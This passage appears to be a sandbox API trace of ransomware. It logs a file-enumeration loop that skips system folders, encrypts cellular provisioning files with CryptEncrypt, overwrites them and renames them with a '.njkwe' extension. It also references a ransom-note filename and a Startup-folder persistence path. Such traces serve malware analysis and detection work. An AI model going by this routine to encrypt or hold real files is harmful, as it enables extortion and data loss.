(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\107__Connections_Cellular_Vodafone Egypt (Egypt)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\107__connections_cellular_vodafone egypt (egypt)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.433] GetTickCount () returned 0x1153729 [0076.433] GetTickCount () returned 0x1153729 [0076.433] GetTickCount () returned 0x1153729 [0076.433] GetTickCount () returned 0x1153729 [0076.433] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.433] GetProcessHeap () returned 0xbe0000 [0076.433] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.433] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x360, lpOverlapped=0x0) returned 1 [0076.435] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffca0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.435] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x360, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x360, lpOverlapped=0x0) returned 1 [0076.435] GetProcessHeap () returned 0xbe0000 [0076.435] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.435] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.435] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.436] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.436] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.436] CloseHandle (hObject=0x43c) returned 1 [0076.436] GetProcessHeap () returned 0xbe0000 [0076.436] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.436] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\107__Connections_Cellular_Vodafone Egypt (Egypt)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 186 [0076.436] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\107__Connections_Cellular_Vodafone Egypt (Egypt)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\107__connections_cellular_vodafone egypt (egypt)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\107__Connections_Cellular_Vodafone Egypt (Egypt)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\107__connections_cellular_vodafone egypt (egypt)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.437] GetProcessHeap () returned 0xbe0000 [0076.437] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.437] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9048435b, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9048435b, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9048435b, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1e0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="108__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="108__C~1.PRO")) returned 1 [0076.437] lstrcmpiW (lpString1="108__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0076.437] lstrcmpiW (lpString1="108__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0076.437] lstrcmpiW (lpString1="108__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0076.437] lstrcmpiW (lpString1="108__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0076.437] lstrcmpiW (lpString1="108__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0076.437] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\108__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0076.437] StrStrIW (lpFirst="108__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0076.437] lstrcmpW (lpString1="108__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.437] lstrcmpW (lpString1="108__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0076.437] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\108__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.437] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\108__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\108__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.437] GetTickCount () returned 0x1153739 [0076.437] GetTickCount () returned 0x1153739 [0076.438] GetTickCount () returned 0x1153739 [0076.438] GetTickCount () returned 0x1153739 [0076.438] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.438] GetProcessHeap () returned 0xbe0000 [0076.438] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.438] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0076.439] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.439] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0076.439] GetProcessHeap () returned 0xbe0000 [0076.439] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.439] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.439] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.448] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.449] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.449] CloseHandle (hObject=0x43c) returned 1 [0076.454] GetProcessHeap () returned 0xbe0000 [0076.454] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.454] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\108__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0076.454] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\108__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\108__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\108__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\108__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.454] GetProcessHeap () returned 0xbe0000 [0076.454] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.455] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9048435b, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9048435b, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9048435b, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cb, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="109__Connections_Cellular_Etisalat Misr (Egypt)_i0$(__MVID)@WAP.provxml", cAlternateFileName="109__C~1.PRO")) returned 1 [0076.455] lstrcmpiW (lpString1="109__Connections_Cellular_Etisalat Misr (Egypt)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.455] lstrcmpiW (lpString1="109__Connections_Cellular_Etisalat Misr (Egypt)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.455] lstrcmpiW (lpString1="109__Connections_Cellular_Etisalat Misr (Egypt)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.455] lstrcmpiW (lpString1="109__Connections_Cellular_Etisalat Misr (Egypt)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.455] lstrcmpiW (lpString1="109__Connections_Cellular_Etisalat Misr (Egypt)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.455] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\109__Connections_Cellular_Etisalat Misr (Egypt)_i0$(__MVID)@WAP.provxml") returned 165 [0076.455] StrStrIW (lpFirst="109__Connections_Cellular_Etisalat Misr (Egypt)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.455] lstrcmpW (lpString1="109__Connections_Cellular_Etisalat Misr (Egypt)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.455] lstrcmpW (lpString1="109__Connections_Cellular_Etisalat Misr (Egypt)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.455] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\109__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.455] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\109__Connections_Cellular_Etisalat Misr (Egypt)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\109__connections_cellular_etisalat misr (egypt)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.455] GetTickCount () returned 0x1153749 [0076.455] GetTickCount () returned 0x1153749 [0076.455] GetTickCount () returned 0x1153749 [0076.455] GetTickCount () returned 0x1153749 [0076.455] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.455] GetProcessHeap () returned 0xbe0000 [0076.455] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.455] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2cb, lpOverlapped=0x0) returned 1 [0076.459] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd35, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.459] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2cb, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2cb, lpOverlapped=0x0) returned 1 [0076.459] GetProcessHeap () returned 0xbe0000 [0076.459] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.459] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.459] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.459] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.459] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.459] CloseHandle (hObject=0x43c) returned 1 [0076.459] GetProcessHeap () returned 0xbe0000 [0076.460] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.460] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\109__Connections_Cellular_Etisalat Misr (Egypt)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 185 [0076.460] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\109__Connections_Cellular_Etisalat Misr (Egypt)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\109__connections_cellular_etisalat misr (egypt)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\109__Connections_Cellular_Etisalat Misr (Egypt)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\109__connections_cellular_etisalat misr (egypt)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.460] GetProcessHeap () returned 0xbe0000 [0076.460] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.460] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90116bb1, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90116bb1, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90116bb1, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c9, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="10__Connections_Cellular_Optus (Australia)_i1$(__MVID)@WAP.provxml", cAlternateFileName="10__CO~1.PRO")) returned 1 [0076.460] lstrcmpiW (lpString1="10__Connections_Cellular_Optus (Australia)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.461] lstrcmpiW (lpString1="10__Connections_Cellular_Optus (Australia)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.461] lstrcmpiW (lpString1="10__Connections_Cellular_Optus (Australia)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.461] lstrcmpiW (lpString1="10__Connections_Cellular_Optus (Australia)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.461] lstrcmpiW (lpString1="10__Connections_Cellular_Optus (Australia)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.461] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\10__Connections_Cellular_Optus (Australia)_i1$(__MVID)@WAP.provxml") returned 160 [0076.461] StrStrIW (lpFirst="10__Connections_Cellular_Optus (Australia)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.461] lstrcmpW (lpString1="10__Connections_Cellular_Optus (Australia)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.461] lstrcmpW (lpString1="10__Connections_Cellular_Optus (Australia)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.461] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\10__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.461] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\10__Connections_Cellular_Optus (Australia)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\10__connections_cellular_optus (australia)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.461] GetTickCount () returned 0x1153749 [0076.461] GetTickCount () returned 0x1153749 [0076.461] GetTickCount () returned 0x1153749 [0076.461] GetTickCount () returned 0x1153749 [0076.461] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.461] GetProcessHeap () returned 0xbe0000 [0076.461] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.461] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2c9, lpOverlapped=0x0) returned 1 [0076.467] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd37, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.467] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2c9, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2c9, lpOverlapped=0x0) returned 1 [0076.467] GetProcessHeap () returned 0xbe0000 [0076.467] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.467] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.467] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.467] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.467] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.467] CloseHandle (hObject=0x43c) returned 1 [0076.467] GetProcessHeap () returned 0xbe0000 [0076.467] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.467] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\10__Connections_Cellular_Optus (Australia)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0076.467] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\10__Connections_Cellular_Optus (Australia)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\10__connections_cellular_optus (australia)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\10__Connections_Cellular_Optus (Australia)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\10__connections_cellular_optus (australia)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.468] GetProcessHeap () returned 0xbe0000 [0076.468] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.468] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9048435b, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9048435b, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9048435b, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c1, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="110__Connections_Cellular_Claro (El Salvador)_i0$(__MVID)@WAP.provxml", cAlternateFileName="110__C~1.PRO")) returned 1 [0076.468] lstrcmpiW (lpString1="110__Connections_Cellular_Claro (El Salvador)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.468] lstrcmpiW (lpString1="110__Connections_Cellular_Claro (El Salvador)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.468] lstrcmpiW (lpString1="110__Connections_Cellular_Claro (El Salvador)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.468] lstrcmpiW (lpString1="110__Connections_Cellular_Claro (El Salvador)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.468] lstrcmpiW (lpString1="110__Connections_Cellular_Claro (El Salvador)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.468] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: 